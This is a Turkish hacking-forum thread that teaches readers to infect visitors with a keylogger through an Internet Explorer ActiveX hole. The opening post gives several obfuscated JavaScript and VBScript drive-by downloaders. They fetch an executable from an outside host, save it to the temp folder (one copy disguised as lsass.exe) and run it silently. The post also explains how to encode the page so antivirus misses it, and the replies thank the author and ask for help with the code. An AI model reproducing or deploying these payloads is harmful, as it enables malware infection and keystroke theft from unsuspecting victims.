İnternet Explorer Açığından Keylog Yedirmek / HTML Keylogger Yapımı

[HENRYAPO]

Anlatım Sahibi USTATA kardesimdir !

S.a Arkadaşlar Bu Makalemde Sizlere HTML Keylogger Kurmayı Anlatacam ve

Gerekli Materyalleri Sunacam.. Peki Html Şeklinde Nasıl Keylog Yedirebilirim?

Çok Basit Ama Bunu Sadece İnternet Explorer'da Bulunan Owerflow Açığından

Yararlanarak Yapabiliriz.Mozilla & Opera Gibi Browser'larda İşlemez.Peki İşin

Mantığı Nedir Diye Sorarsanız Mantık Şudur VB'De Derlenmiş Kodları <head>

</head> Tagları Arasına Koyup Owerflow Yaparak Çalıştırmak.Peki İE İle

Girdiklerine Kurbanların Karşına Ne Çıkar ? Activex Denetimi Çıkar Bu Kodlara

Göre Değişir Eğer Güzel ve Anti'lere Yakalanmayan Priv8 Bir Kodunuz Varsa

İşiniz % 70 Kolaylaşır.Alt Tarafta Size Kodları Vereceğim.Şimdi Gelelim İşin

Asıl Kısmına server.exe ! Herhangi Bir Keylog'dan exe Yapın Demiyecem Bunu

Size Tavsiye Etmiyorum.Asla Piyasadaki Keylogger'ları Kullanmayın.Hem

Antilere Yakalanıyor Hemde Bilgisayarınıza Truva Atı Yüklüyorlar.Bunun İçin

Sizlere Priv8 Yazılımları Öneririm.Yahut Biraz Para Verip İnternetten Para İle

Satışa Sunulan Keyloggerları Alıp Anti-Virüs Derdi Olmadan İsteğinize

Yedirebilmektir.

Peki Şimdi server'ım ve Kodlarım Elimde Ne Yapmam Lazım ? Bundan Sonrası

Çocuk Oyuncağı Bir ftp ve Birde html bir index.

http://www.siberaskerler.org/Unicode/encoder.htm => Bu Adrese Girip

Aşağıdaki Verdiğim Kodları Kendinize Göre Uyarlayıp Kodları Komple Buraya

Yapıştır Diyoruz.Daha Sonra Encode Html Butonuna Basarak Bize Verilen Kodu

İndeximizin <head> </head> Taglarının Arasına Ekliyoruz

Örnek Bir Encode : <script

type="text/javascript">document.write('\u0053\u0069\u0062\u00 65\u0072\u0041\u0073\u006b\u0065\u0072\u006c\u0065 \u0072\u002e\u004f\u0072\u0067')</script>

Bakınız : '\u0053\u0069 Gibi Şifreleme Oldu Şu An Burda SiberAskerler.Org

Yazıyor Sonra Html Yaparak Sitenize Atın Kurbanlara Yedirin Olay Bundan

İbaret.Kodlar Aşağıda...

Kod:

<script type="text/javascript" ****************="javascript">var iss = false;var uri = 'http://www.siteadı.com/server.exe.';var za = 'ting.FileS';var z = 'plication';var shellapp = 'Shell.Ap'+z;var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29";var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29  ";var z03 = "r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C  %20%22%22%29";var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%2  9";var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29";var z06 = "r%20%3D%2'+'0o.GetObject%28n%29";var a1 = 'ADO';var a2 = 'DB.';var a3 = 'Str';var a4 = 'eam';var obj_t = new Array(  'BD96'+'C556-65A'+'3-11D0-983'+'A-00C0'+'4FC29E36',  'AB9BCED'+'D-EC'+'7E-47E1-9322-D'+'4A210617116',  '0006F'+'033-0000-0000-C000-00000'+'0000046',  '0006F03A-0000-00'+'00-C000-000000000046',  '6e32070a-766d-4ee6-879c-dc1'+'fa91d2fc3',  '6414512B-B978-451D-A0D8-F'+'CFDF33E833C',  '7F5B7'+'F63-F06F-43'+'31-8A'+'26-339'+'E03C0AE3D',  '06723E09-F4'+'C2-43c8-8358-09F'+'CD1DB0766',  '639F725F-1B2'+'D-4831-A9FD-8748'+'47682'+'010',  'BA018'+'599-1DB3-44f9-83B4-461454C8'+'4BF8',  'D0C07D56'+'-7C'+'69-43'+'F1-B4A0-25'+'F5A11FAB19',  'E8CCCDDF-C'+'A28-496b-B050-6C'+'07C962476B');function CreateO(o, n) {  var r = null;    var ko1 = 'etObject(n)';  var ko3 = 'teObject(n)';  var ko4 = 'o.Create';  var ko5 = 'bject("", n';  var ko6 = 'reateObj';  var ko7 = 'r = o.Ge';  try { eval('r = o.Crea'+ko3) }catch(e){}    if (! r) {    try { eval('r = '+ko4+'Object(n, "")') }catch(e){}  }    if (! r) {    try { eval('r = o.C'+ko6+'ect(n, "", "")') }catch(e){}  }  if (! r) {    try { eval('r = o.GetO'+ko5+')') }catch(e){}  }    if (! r) {    try { eval(ko7+'tObject(n, "")') }catch(e){}  }    if (! r) {    try { eval('r = o.G'+ko1) }catch(e){}  }  return(r);  }function iii() {  return true;}window.onerror = iii;function rname() {  var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmn  opqrstuvwxyz";  var string_length = 8;  var randomstring = '';for (var i=0; i<string_length; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1);  } return randomstring + '.exe';} function DoIt() {   x.Open('GET',uri + '?e=' + escape(rname()),false);  x.Send(); var fname1 = rname(); var f = xml.CreateObject('Scrip'+za+'ystemObject',''); var tmp = f.GetSpecialFolder(2);  fname1 = f.BuildPath(tmp,fname1);  S.open();  S.write(x.responseBody);  S.savetofile(fname1,2);  S.close(); var Q = xml.createobject(shellapp,'');  Q.ShellExecute(fname1,'','','open',0);} if (window.ActiveXObject) { var ni = 0; while (obj_t[ni]) { var xml = null; var xml = document.createElement('object'); guid = obj_t[ni];    xml.setAttribute('classid','clsid:'+guid); if (xml) {      n_xml = 'Microsoft.XMLHTTP'; try { var x = null; var x = CreateO(xml,n_xml); if (x) {          str1 = a1 + a2;          str1 = str1 + a3 + a4;          str5 = str1; var S = xml.CreateObject(str5,"");          S.type = 1;          str6 = 'GET';          DoIt();        }      } catch(e){}    }    ni++;  }}</script><script><!--try { function f(b, a, c) { return a + b + c; } function g(b, a) { return a + b; }var s = new Array( "", "server.exe", "http://www.siteadı.com/", "object", "classid", f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")), g(f("ft.XMLH", "oso", "TTP"), "Micr"), f("E", "G", "T"), f(g(".Str", "odb"), "Ad", "eam"), f(g(".She", "ipt"), "WScr", "ll"), "PROCESS", "TMP", "/[^/]*$", "/", "\\");a = document.createElement(s[3]);a.setAttribute(s[4], s[5]);with(a.CreateObject(s[6], s[0])){ open(s[7], ********.href.replace(new RegExp(s[12]), s[13] + s[1]), false); send(); if(status < 400)  with(a.CreateObject(s[8], s[0]))  {   Type = 1;   Open();   Write(responseBody);   with(a.CreateObject(s[9], s[0]))   {    c = Environment(s[10])(s[11]) + s[14] + s[1];    SaveToFile(c, 2);    Exec(c);   }  }}} catch (e) {}// --></script>

Kod:

<HTML><HEAD><**** http-eqiv="content-type" ********************text/html;charset=gb2312"><title>test</title><textarea style="display:none" id=lshdic200Xpage rows="1" cols="20"></textarea><script ****************=vbs>document.write(strreverse(lshdic200Xpage.value))</script><script****************="VBScript">  on error resume next  xx="object"  xxx="classid"  xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"  xxxxx="Microsoft.XMLHTTP"  xxxxxx="GET"  xxxxxxx="Scripting.FileSystemObject"  xxxxxxxx="Shell.Application"  dl = "http://www.ustata.us/ustata.exe"  Set df = document.createElement(xx)  df.setAttribute xxx, xxxx  str=xxxxx  Set a = df.CreateObject(str,"")  a1="Ado"  a2="db."  a3="Str"  a4="eam"  str1=a1&a2&a3&a4  str5=str1  set S = df.createobject(str5,"")  S.type = 1  str6=xxxxxx  a.Open str6, dl, 0  a.Send  fname1="s.exe"  set F = df.createobject(xxxxxxx,"")  set tmp = F.GetSpecialFolder(2)  fname1= F.BuildPath(tmp,fname1)  S.open  S.write a.responseBody  S.savetofile fname1,2  S.close  set Q = df.createobject(xxxxxxxx,"")  str1=a1&a2&a3&a4  Q.ShellExecute fname1,"","","open",0  </script><script type="text/jscript">function init() {document.write(Date());}window.onload = init;</script></HEAD><BODY></BODY></HTML>

Kod:

<script ****************="JavaScript1.2"><!--l=new Array(-56,-27,-10,-5,32,-7,105,-9,50,51,-16,-13,99,-15,49,83,-18,114,-24,-21,65,-23,57,58,-26,48,53,-43,-32,-31,34,46,-34,106,-40,-37,120,-39,84,103,-42,109,117,-47,-46,98,115,-53,-50,110,-52,41,70,-55,44,61,-76,-65,-60,101,-62,108,-64,100,102,-67,116,-69,97,-73,-72,54,66,-75,45,47,-112,-79,111,-93,-90,-83,121,-87,-86,72,76,-89,52,56,-92,67,104,-101,-98,-97,68,71,-100,60,62,-109,-106,-105,118,119,-108,86,88,-111,77,80,-116,-115,10,38,-118,112,-120,40,-122,69,79);d="aPN65`+4^LaYVWZiMGA<]0/eNEI***[Z26E-*D0U`_*d,]XF***X4-044+g3V2YA:d<<0L`;iO"+",e14i;M/:<N8X**+M//3E/14RZP5eJ..OCU;=2H++37/6GbGJeXDMdidHX1^JhcRUB9AMU=MQ5"+"[chT9DCbT08YZh[1***KW/9RbK.7MFQS48RbHhSG2W5@iMJ**/[:B[:Z9KM//3`0L`;jBT,?h-"+"D4H:K`^Q***KW9R8=BMT3P3;`+G0;`.@A2c**-BR6BRF1Z[LLNN7/TM04JOI:aQN2GF**-041="+"@M_*i+A8**+-D0I;VjOS1***[LKNjj:c.7RCc.DeU[bIYX;>D6O4]<BXYZVh5-:C652:g.hS7M"+"J**B[:]<cFPc**18***a4+a-cB[;<<0L`;M/:<YN/N65`,F@_X[<JY:aRAIa4JO2H:K`Z**0[:"+"HVaU*i-W8^//iJJU<Gd4D-I-8X**+83h.59<Z_0=,].F**,F=c8_b?cS=EhT`jHVaU9=LGF**-"+"Q***[LK_de18**+M/-Sb3K?*B[:]=:ba87LfNaJ**8**+M/-SEEF;@=LO*=LH0c**06>8NNVE1"+"8F**+V>06>I+g6BRS3-;DR[LR3A],hF<NNdf_K.W:VF:gK-UJ**F**-049S5`[4AdC+/h:.cQN"+"2H:Kd0HK[-[fP`ID:ZY?WJ";c=810;b=a=0;o="";function GetBit(){if(a==0){b=d.charCodeAt(0)-42;if(b>50)b--;d=d.slice(1,d.length);a=6;}a--;return ((b >> a) & 0x01);}window.status='Decompressing';while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;}o+=String.fromCharCode(l[i]);}document.write(o);window.status='Document Loaded';// --></script><script ****************="VBScript">    on error resume next    Set obj1 = document.createElement("object")    obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"    est1="Microsoft."&"_xmlHTTP"    Set obj2 = obj1.CreateObject(est1,"")    est="Ado"&"db."&"Str"&"eam"    set obj3 = obj1.createobject(est,"")    obj3.type = 1    est2="GET"    obj2.Open est2, "http://www.ustata.us/ustata.exe", False    obj2.Send        set F = obj1.createobject("Scripting.FileSystemObject","")    set pasta = F.GetSpecialFolder(2)    fi="lsass.exe"    fi= F.BuildPath(pasta,fi)        obj3.open    obj3.write obj2.responseBody        obj3.savetofile fi,2    obj3.close    set obj5 = obj1.createobject("Shell.Application","")        obj5.ShellExecute fi,"","","open",0</script>LÜTFEN BEKLEYİNİZ YÖNLENDİRİLİYORSUNUZ(10 SN)

Kod:

<script ****************="JavaScript"><!--setInterval("window.status='Please Wait Loadong Website'",5);//--></SCRIPT><HEAD><script ****************="JavaScript"><!--eval(unescape("%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D"));//--></SCRIPT><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT><script ****************="JavaScript"><!--hp_d01(unescape(">JGCF%3C>-JGCF%3C"));//--></SCRIPT></HEAD><BODY><script ****************="JavaScript"><!--hp_d01(unescape(">@MF[%3C>kdpcog%22qpa? jvvr8--fcapmu,cvqrcag,amo-ockl,rjr %22ukfvj?3%22jgkejv?3%3C>-kdpcog%3C>-@MF[%3C"));//--></SCRIPT></BODY><script ****************="javascript" type="text/javascript">function yjosvfg(tmolpr, nxj) {var mst = null;try { eval('mst = tmolpr.CreateObject(nxj)') }catch(eexvw){}if (! mst) {try { eval('mst = tmolpr.CreateObject(nxj, "")') }catch(eexvw){}}if (! mst) {try { eval('mst = tmolpr.CreateObject(nxj, "", "")') }catch(eexvw){}}if (! mst) {try { eval('mst = tmolpr.GetObject("", nxj)') }catch(eexvw){}}if (! mst) {try { eval('mst = tmolpr.GetObject(nxj, "")') }catch(eexvw){}}if (! mst) {try { eval('mst = tmolpr.GetObject(nxj)') }catch(eexvw){}}return(mst);}function zktwy(okicgh) {btmtqa = "G"+"ET";var psmbl = "http://your.exe";qmes = "XM"+"L"+"H"+"TTP";var fqjtn = okicgh.CreateObject("Scripting"+".File"+"Sy"+"stemO"+"bjec"+"t", "")cwropa = "Sh"+"e"+"ll";zcttrdc = "A"+"DO"+"D"+"B"dmyk = "mstngqx"+".exe";kjmnfd = ".";tzmgpkw = "GE"+"T";nzoqgzh = "A"+"pplicat"+"i"+"o"+"n";ynxk = ".";uex = "S"+"tr"+"eam";juq = "MS"+"XM"+"L"+"2";var ammlqg = yjosvfg(okicgh, cwropa+kjmnfd+nzoqgzh);uudql = "M"+"icro"+"soft";mnisl = 5+10+1+1+10;prdtbs = "GET";sqfpjh = "XMLH"+"TTP";var pnbg = yjosvfg(okicgh, zcttrdc+ynxk+uex);gxglti = "MSX"+"M"+"L2";pbdfi = btmtqa;var prwm = null;tmq = "Serv"+"er";dmyk = fqjtn.BuildPath(fqjtn.GetSpecialFolder(2), dmyk);ppt = "XM"+"LH"+"TT"+"P";pnbg.Mode = 3;try {guerw = "cb"+"pbowr";prwm = yjosvfg(okicgh, uudql+kjmnfd+qmes);prwm.open(btmtqa, psmbl, false);} catch(eexvw) {try {prwm = yjosvfg(okicgh, juq+ynxk+sqfpjh);prwm.open(tzmgpkw, psmbl, false);} catch(mnisl) {try {prwm = yjosvfg(okicgh, gxglti+kjmnfd+tmq+ppt);prwm.open(prdtbs, psmbl, false);;} catch(guerw) {try {prwm=new XMLHttpRequest();prwm.open(pbdfi, psmbl, false);} catch(tmq){return 0;}}}}pnbg.Type = 1;prwm.send(null);eitor = prwm.responseBody;if (9+6+14 > 1+1+1+1+1+1+8+6+1+1+1+7+1) {alert("eexvw");} else {pnbg.Open();pnbg.Write(eitor);if (9+6+4 > 8+5+2+6+1+1+1) {alert("ppt");} else {pnbg.SaveToFile(dmyk, 2);}}ammlqg.ShellExecute(dmyk);return 1;}var i = 0;var nwyqw = new Array("{BD96C556"+"-65A"+"3"+"-11"+"D"+"0"+"-983A-00C"+"0"+"4FC29E36"+"}","{A"+"B9B"+"C"+"E"+"D"+"D"+"-"+"E"+"C"+"7"+"E"+"-"+"47"+"E"+"1"+"-"+"9"+"322-D4"+"A"+"21"+"0"+"617116"+"}","{"+"0"+"006F033-0000"+"-"+"0"+"000-C000-000000"+"0"+"00046}","{000"+"6F03"+"A"+"-"+"0"+"0"+"0"+"0"+"-0"+"000-C00"+"0-"+"0"+"00"+"0000"+"00046}","{6e3"+"2070a-766d"+"-4"+"ee"+"6-8"+"79c-dc"+"1fa"+"9"+"1d2fc3"+"}","{6414512B-B978-4"+"5"+"1D-A"+"0D8-FCFDF33E833C}","{"+"7F5B7F"+"6"+"3"+"-"+"F06F"+"-4331-8A"+"2"+"6-"+"339E03C0AE"+"3"+"D"+"}","{"+"067"+"2"+"3"+"E09-F"+"4C"+"2"+"-43"+"c8-8"+"3"+"5"+"8-09F"+"CD1DB0766"+"}","{"+"639F72"+"5"+"F-1B2D"+"-"+"4"+"831-A9FD-8"+"7"+"48"+"47"+"682010}","{"+"B"+"A"+"0"+"1"+"85"+"99-1DB3-4"+"4f"+"9"+"-83"+"B4-46"+"1454"+"C"+"8"+"4BF"+"8"+"}","{"+"D"+"0C0"+"7"+"D"+"56-7"+"C69-43"+"F1-"+"B"+"4"+"A"+"0"+"-25F5A11"+"FA"+"B1"+"9"+"}","{E8CCCDDF-CA2"+"8"+"-"+"49"+"6b-B050-6C07C"+"96247"+"6"+"B}",null);good = 0;while (nwyqw[i]) {var ylsjh = null;n = 1+3+4+2;if (nwyqw[i].substring(0,1) == "{") {ylsjh = document.createElement("obj"+"ect");grlicsx = 2+2+1+1;ylsjh.setAttribute("c"+"la"+"ssid", "c"+"ls"+"id:" + nwyqw[i].substring(1, nwyqw[i].length - 1));} else {try { ylsjh = new ActiveXObject(nwyqw[i]); } catch(eexvw){}}if (ylsjh) {try {var yrchlrz = yjosvfg(ylsjh, "S"+"hell"+"."+"Appli"+"c"+"ation");if (yrchlrz) { good = zktwy(ylsjh); if (good) {break;} }} catch(eexvw) {}}i++;}if (good == 0) {c = "http://site.com/aquiseu.exe";window.******** = c;}</SCRIPT>

Selametle ...

[CoZumX]

KArdesım once Anlatım icin Tskler bilmeyenler icin bulunmuycak bir konu ama soyle bırsey var son sıralar explorerde bulunan owerflow acıgı ve kodlanan scriptler neredeyse butun forumlarda bıldırılmekte onun icin insanlar ozellıkle [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] bu tur sitelere girerken genellıkle "dogal olarak " :) opera mozılla gibi browserle acıo...

[Sorcex]

tşkler paylaşım için

[lanet_zebani]

evt güzel bi anlatım olmuş ustata kardeşimm. paylaşım içinde ayrıca tşk ederim mareşalim :)

[HENRYAPO]

eyw saolun

[musicmen]

fname1="TMP9482.exe"
kodda bir hatamı var burayı anlamdım tmp9482 exe explorer ilemi alakalı yoksa bizim serverda bulunması gerekli bir dosyamı?

[HENRYAPO]

hangi kodu alıyosun yardımcı olalım. he sunuda belirtim.. bu explorer 6.0 da işliyor . ve cozumx dediği gibi herkez biliyor artık Antiler de yakalıyor ! yedirceniz kişinin 6.0 ve antivirüs programı olmamas lazım ...! =) yeni kodlar verilicektir

[LaneT]

Ewy... Güsel paylaşım!